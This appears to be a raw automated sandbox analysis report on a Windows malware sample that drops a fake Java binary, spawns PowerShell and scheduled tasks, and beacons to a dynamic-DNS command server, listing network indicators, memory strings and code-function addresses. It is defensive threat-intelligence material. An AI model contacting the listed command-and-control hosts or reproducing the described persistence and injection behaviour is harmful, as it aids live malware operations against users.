Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140038E50 strncpy,MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,malloc,FindClose,		25_2_0000000140038E50

Software Vulnerabilities

Exploit detected, runtime environment starts unknown processes

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: blockchainlegion.duckdns.org

Source: global traffic

HTTP traffic detected: POST /api/point.php HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonContent-Length: 270Host: blockchainlegion.duckdns.org

Source: Joe Sandbox View

IP Address: 173.244.207.29 173.244.207.29

Source: Joe Sandbox View

ASN Name: FREE-MPEIRU FREE-MPEIRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 173.244.207.29:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: polygon-rpc.com
Source: global traffic	DNS traffic detected: DNS query: blockchainlegion.duckdns.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP Example/1.0Content-Length: 136Host: polygon-rpc.com

Source: conhost.exe, 00000019.00000002.3065697206.0000016478564000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/
Source: conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/#
Source: conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/%
Source: conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/)
Source: conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/K
Source: dialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75
Source: conhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.php
Source: conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phpC
Source: conhost.exe, 00000019.00000002.3066367565.000001647866C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phpl
Source: conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phpvvd
Source: conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phpzvd
Source: conhost.exe, 00000019.00000002.3065697206.0000016478593000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/j
Source: conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/o
Source: conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/pvd
Source: conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org:80/api/point.php
Source: conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org:80/api/point.phpP#
Source: conhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckg
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/0UNPcCFk
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/0UNPcCFt
Source: conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1962703704.0000016476753000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1962703704.000001647672F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://polygon-rpc.com/
Source: conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://polygon-rpc.com/ttings
Source: conhost.exe, 00000019.00000003.1962703704.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://polygon-rpc.com:443/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 173.244.207.29:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400344C0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,		25_2_00000001400344C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140034A20 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,		25_2_0000000140034A20

Source: schtasks.exe	Process created: 42
Source: conhost.exe	Process created: 47

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099B1394 NtCreateDirectoryObject,	0_2_00007FF6099B1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A61394 NtRequestPort,	16_2_00007FF6E3A61394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A61394 NtAllocateVirtualMemoryEx,	17_2_00007FF6E3A61394
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140001394 NtCreateFile,	25_2_0000000140001394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4A1394 NtSetSystemEnvironmentValue,	35_2_00007FF75B4A1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFF1394 NtQueryBootOptions,	49_2_00007FF6ECFF1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD51394 NtAccessCheck,	69_2_00007FF71BD51394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EF1394 NtSetVolumeInformationFile,	83_2_00007FF7C0EF1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642721394 NtCreateDirectoryObjectEx,	97_2_00007FF642721394

Source: C:\Windows\System32\conhost.exe

Code function: 25_2_00000001400394B0: MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,CreateFile2,DeviceIoControl,CloseHandle,free,malloc,memcpy,WideCharToMultiByte,WideCharToMultiByte,calloc,WideCharToMultiByte,strncpy,free,free,free,

25_2_00000001400394B0

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099B92BB	0_2_00007FF6099B92BB
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099C0A70	0_2_00007FF6099C0A70
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099C0160	0_2_00007FF6099C0160
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099C6520	0_2_00007FF6099C6520
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099BAD10	0_2_00007FF6099BAD10
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099C4440	0_2_00007FF6099C4440
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099BA480	0_2_00007FF6099BA480
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099B1B40	0_2_00007FF6099B1B40
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099D3B80	0_2_00007FF6099D3B80
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099C76E0	0_2_00007FF6099C76E0
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF6099CD0F0	0_2_00007FF6099CD0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A76520	16_2_00007FF6E3A76520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A6AD10	16_2_00007FF6E3A6AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A74440	16_2_00007FF6E3A74440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A6A480	16_2_00007FF6E3A6A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A61B40	16_2_00007FF6E3A61B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A83B80	16_2_00007FF6E3A83B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A692BB	16_2_00007FF6E3A692BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A70A70	16_2_00007FF6E3A70A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A70160	16_2_00007FF6E3A70160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A7D0F0	16_2_00007FF6E3A7D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 16_2_00007FF6E3A776E0	16_2_00007FF6E3A776E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A83B80	17_2_00007FF6E3A83B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A76520	17_2_00007FF6E3A76520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A6AD10	17_2_00007FF6E3A6AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A74440	17_2_00007FF6E3A74440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A6A480	17_2_00007FF6E3A6A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A61B40	17_2_00007FF6E3A61B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A692BB	17_2_00007FF6E3A692BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A70A70	17_2_00007FF6E3A70A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A70160	17_2_00007FF6E3A70160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A7D0F0	17_2_00007FF6E3A7D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 17_2_00007FF6E3A776E0	17_2_00007FF6E3A776E0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400938C0	25_2_00000001400938C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400938E0	25_2_00000001400938E0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006405B	25_2_000000014006405B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140012071	25_2_0000000140012071
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140071080	25_2_0000000140071080
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400700B0	25_2_00000001400700B0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006E0F0	25_2_000000014006E0F0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000D0FC	25_2_000000014000D0FC
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014003D170	25_2_000000014003D170
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400471A0	25_2_00000001400471A0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001A230	25_2_000000014001A230
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400102DE	25_2_00000001400102DE
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014004E340	25_2_000000014004E340
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000E34B	25_2_000000014000E34B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000C39C	25_2_000000014000C39C
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140072400	25_2_0000000140072400
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000A430	25_2_000000014000A430
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001144E	25_2_000000014001144E
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400334C0	25_2_00000001400334C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014005E510	25_2_000000014005E510
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400485E0	25_2_00000001400485E0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006F630	25_2_000000014006F630
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000B63C	25_2_000000014000B63C
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140032650	25_2_0000000140032650
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001C650	25_2_000000014001C650
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140012691	25_2_0000000140012691
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000D70B	25_2_000000014000D70B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140043730	25_2_0000000140043730
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000F73E	25_2_000000014000F73E
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140070760	25_2_0000000140070760
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006B7F0	25_2_000000014006B7F0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014002E830	25_2_000000014002E830
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_00000001400108AE	25_2_00000001400108AE
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014003D8C2	25_2_000000014003D8C2
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140061910	25_2_0000000140061910
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001C918	25_2_000000014001C918
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140018940	25_2_0000000140018940
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014005A9C0	25_2_000000014005A9C0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140072A20	25_2_0000000140072A20
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140072A22	25_2_0000000140072A22
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140062A50	25_2_0000000140062A50
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000CA4C	25_2_000000014000CA4C
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140021A60	25_2_0000000140021A60
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140011A61	25_2_0000000140011A61
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006CB20	25_2_000000014006CB20
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140030B40	25_2_0000000140030B40
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014007BB50	25_2_000000014007BB50
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001EBB0	25_2_000000014001EBB0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014003DBE0	25_2_000000014003DBE0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140072C00	25_2_0000000140072C00
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014001CC12	25_2_000000014001CC12
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140041CA0	25_2_0000000140041CA0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000BCEC	25_2_000000014000BCEC
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140051D10	25_2_0000000140051D10
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000FD0E	25_2_000000014000FD0E
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000DD2B	25_2_000000014000DD2B
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140006D30	25_2_0000000140006D30
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000ED30	25_2_000000014000ED30
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140047D50	25_2_0000000140047D50
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140071D70	25_2_0000000140071D70
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140068D80	25_2_0000000140068D80
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006ED80	25_2_000000014006ED80
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140008DB0	25_2_0000000140008DB0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140053DF0	25_2_0000000140053DF0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140010E7E	25_2_0000000140010E7E
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014006AEA0	25_2_000000014006AEA0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140019EC0	25_2_0000000140019EC0
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_000000014000AF8C	25_2_000000014000AF8C
Source: C:\Windows\System32\conhost.exe	Code function: 25_2_0000000140054FB0	25_2_0000000140054FB0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4C3B80	35_2_00007FF75B4C3B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4AA480	35_2_00007FF75B4AA480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4B4440	35_2_00007FF75B4B4440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4AAD10	35_2_00007FF75B4AAD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4A1B40	35_2_00007FF75B4A1B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4B0A70	35_2_00007FF75B4B0A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4A92BB	35_2_00007FF75B4A92BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4B0160	35_2_00007FF75B4B0160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4BD0F0	35_2_00007FF75B4BD0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4B76E0	35_2_00007FF75B4B76E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 35_2_00007FF75B4B6520	35_2_00007FF75B4B6520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED013B80	49_2_00007FF6ED013B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED0076E0	49_2_00007FF6ED0076E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED00D0F0	49_2_00007FF6ED00D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED000A70	49_2_00007FF6ED000A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFF92BB	49_2_00007FF6ECFF92BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED000160	49_2_00007FF6ED000160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED004440	49_2_00007FF6ED004440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFFA480	49_2_00007FF6ECFFA480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFFAD10	49_2_00007FF6ECFFAD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ED006520	49_2_00007FF6ED006520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 49_2_00007FF6ECFF1B40	49_2_00007FF6ECFF1B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD73B80	69_2_00007FF71BD73B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD5AD10	69_2_00007FF71BD5AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD5A480	69_2_00007FF71BD5A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD64440	69_2_00007FF71BD64440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD51B40	69_2_00007FF71BD51B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD592BB	69_2_00007FF71BD592BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD60A70	69_2_00007FF71BD60A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD60160	69_2_00007FF71BD60160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD6D0F0	69_2_00007FF71BD6D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD676E0	69_2_00007FF71BD676E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 69_2_00007FF71BD66520	69_2_00007FF71BD66520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F13B80	83_2_00007FF7C0F13B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F00160	83_2_00007FF7C0F00160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EF92BB	83_2_00007FF7C0EF92BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F00A70	83_2_00007FF7C0F00A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EF1B40	83_2_00007FF7C0EF1B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EFAD10	83_2_00007FF7C0EFAD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0EFA480	83_2_00007FF7C0EFA480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F04440	83_2_00007FF7C0F04440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F06520	83_2_00007FF7C0F06520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F076E0	83_2_00007FF7C0F076E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 83_2_00007FF7C0F0D0F0	83_2_00007FF7C0F0D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 97_2_00007FF642743B80	97_2_00007FF642743B80
